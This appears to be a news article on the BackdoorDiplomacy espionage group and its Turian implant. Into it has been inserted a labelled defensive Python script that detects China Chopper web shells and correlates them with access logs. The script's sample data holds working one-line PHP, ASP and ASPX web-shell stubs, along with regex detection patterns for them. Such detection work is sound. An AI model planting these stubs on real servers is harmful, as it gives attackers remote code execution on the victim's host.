
New Cyber Espionage Group Targeting Ministries of Foreign Affairs

2021-06-11 07:01:00
The Hacker News
thehackernews.com

9.8 Critical (CVSS 3.1)
Attack Vector: NETWORK
Attack Complexity: LOW
Privileges Required: NONE
User Interaction: NONE
Scope: UNCHANGED
Confidentiality Impact: HIGH
Integrity Impact: HIGH
Availability Impact: HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

10 High (CVSS 2)
Access Vector: NETWORK
Access Complexity: LOW
Authentication: NONE
Confidentiality Impact: COMPLETE
Integrity Impact: COMPLETE
Availability Impact: COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C


Cybersecurity researchers on Thursday took the wraps off a new cyber espionage group that has been behind a series of targeted attacks against diplomatic entities and telecommunication companies in Africa and the Middle East since at least 2017.

Dubbed “BackdoorDiplomacy,” the group targets weak points in internet-exposed devices such as web servers, then moves laterally across the network to deploy a custom implant called Turian that can exfiltrate sensitive data stored on removable media.

“BackdoorDiplomacy shares tactics, techniques, and procedures with other Asia-based groups. Turian likely represents a next stage evolution of Quarian, the backdoor last observed in use in 2013 against diplomatic targets in Syria and the U.S.,” said Jean-Ian Boutin, head of threat research at Slovak cybersecurity firm ESET.

With tooling for both Windows and Linux, the group singles out management interfaces for networking equipment and servers with internet-exposed ports, likely exploiting unpatched vulnerabilities to deploy the China Chopper web shell for initial access, then using the shell for reconnaissance and to install the backdoor.

Targeted systems include F5 BIG-IP devices (CVE-2020-5902), Microsoft Exchange servers, and Plesk web hosting control panels. Victims have been identified in the Ministries of Foreign Affairs of multiple African countries, as well as in Europe, the Middle East, and Asia. Additionally, telecom providers in Africa and at least one Middle Eastern charity have also been hit.
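The initial-access chain described above (exploit an exposed web-facing service, drop a one-line web shell, drive it over HTTP) leaves two artifacts a responder can hunt for without any knowledge of the specific exploit: the shell file itself under the web root, and the POST traffic that operates it. The following Python is an added example written for this page, not code from the article, ESET, or the threat actor. The regexes cover the classic publicly documented one-line China Chopper stubs for PHP, ASP and ASPX; an actor can trivially change the stub, so treat hits as triage leads rather than proof, and treat a clean scan as no evidence of absence. It assumes an Apache/nginx "combined" access-log format, and the sample file contents and log lines are constructed for illustration.

```python
"""Added example: find China Chopper-style one-line web shells under a web
root and correlate each hit with POST traffic in an Apache "combined" log.
Sample file contents and log lines below are constructed for illustration."""
import posixpath
import re
from collections import Counter, defaultdict

# Regexes for the classic China Chopper server-side stubs (PHP, ASP, ASPX),
# as publicly documented. A hit means "review this file", not proof.
WEBSHELL_PATTERNS = {
    "php_eval_request_param": re.compile(
        r"@?\beval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.IGNORECASE),
    "asp_eval_request": re.compile(
        r"<%\s*@?\s*eval\s*\(?\s*request\s*\(", re.IGNORECASE),
    "aspx_eval_unsafe": re.compile(
        r'\beval\s*\(\s*Request\.Item\s*\[[^\]]*\]\s*,\s*"unsafe"', re.IGNORECASE),
}

# Apache/nginx "combined" log format (assumed log layout).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')


def scan_files(files):
    """files: {filesystem path: text}. Returns {path: [matched pattern names]}."""
    hits = {}
    for path, text in files.items():
        matched = [name for name, rx in WEBSHELL_PATTERNS.items() if rx.search(text)]
        if matched:
            hits[path] = matched
    return hits


def parse_log(lines):
    """Yield field dicts for lines in combined format; silently skip others."""
    for line in lines:
        m = LOG_RE.match(line.rstrip("\n"))
        if m:
            yield m.groupdict()


def correlate(hits, web_root, log_lines):
    """Map each flagged file to its URL path and summarise who talked to it.
    Web shells are driven almost exclusively over POST, so a script that only
    ever receives POSTs from a few addresses is a strong signal even when the
    request body is not logged."""
    posts = defaultdict(Counter)   # url path -> Counter of client IPs
    others = Counter()             # url path -> non-POST request count
    for rec in parse_log(log_lines):
        url = rec["path"].split("?", 1)[0]
        if rec["method"] == "POST":
            posts[url][rec["ip"]] += 1
        else:
            others[url] += 1
    report = {}
    for fs_path, patterns in hits.items():
        url = "/" + posixpath.relpath(fs_path, web_root)
        report[url] = {
            "patterns": patterns,
            "post_clients": dict(posts.get(url, Counter())),
            "non_post_requests": others.get(url, 0),
        }
    return report


# Constructed sample data (not from any real incident).
WEB_ROOT = "/srv/www"
SAMPLE_FILES = {
    "/srv/www/index.php": "<?php $p = json_decode($_POST['data'] ?? '{}'); echo 'ok'; ?>",
    "/srv/www/uploads/cache.php": "<?php @eval($_POST['password']);?>",
    "/srv/www/images/help.asp": '<%eval request("password")%>',
    "/srv/www/aspnet_client/x.aspx":
        '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
}
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2021:02:14:07 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jun/2021:02:15:31 +0000] "POST /uploads/cache.php HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jun/2021:02:15:44 +0000] "POST /uploads/cache.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Jun/2021:02:16:02 +0000] "POST /index.php HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Jun/2021:02:17:10 +0000] "POST /images/help.asp HTTP/1.1" 200 96 "-" "Mozilla/5.0"',
    'garbage line that does not parse',
]


def run_sample():
    """Scan the constructed web root and join the hits with the sample log."""
    return correlate(scan_files(SAMPLE_FILES), WEB_ROOT, SAMPLE_LOG)


if __name__ == "__main__":
    for url, info in run_sample().items():
        print(url, info)
```

In a real engagement, replace SAMPLE_FILES with a walk of the web root (reading files as text with errors ignored) and SAMPLE_LOG with the server's access logs; the shell that receives only POSTs from one or two external addresses, with no referer and no matching GETs, is the one to pull for timeline analysis first. Because the appliance classes the article names (F5 BIG-IP, Exchange, Plesk) each log in their own formats, LOG_RE will need adjusting per source.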

“In each case, operators employed similar tactics, techniques, and procedures (TTPs), but modified the tools used, even within close geographic regions, likely to make tracking the group more difficult,” the researchers said. BackdoorDiplomacy is also believed to overlap with previously reported campaigns operated by a Chinese-speaking group that Kaspersky tracks as “CloudComputating.”

Beyond gathering system information, taking screenshots, and carrying out file operations, Turian uses a network encryption protocol that ESET researchers say is nearly identical to the one employed by WhiteBird, a C++ backdoor operated by an Asia-based threat actor named Calypso. WhiteBird was installed within diplomatic organizations in Kazakhstan and Kyrgyzstan during the same timeframe as the BackdoorDiplomacy activity.

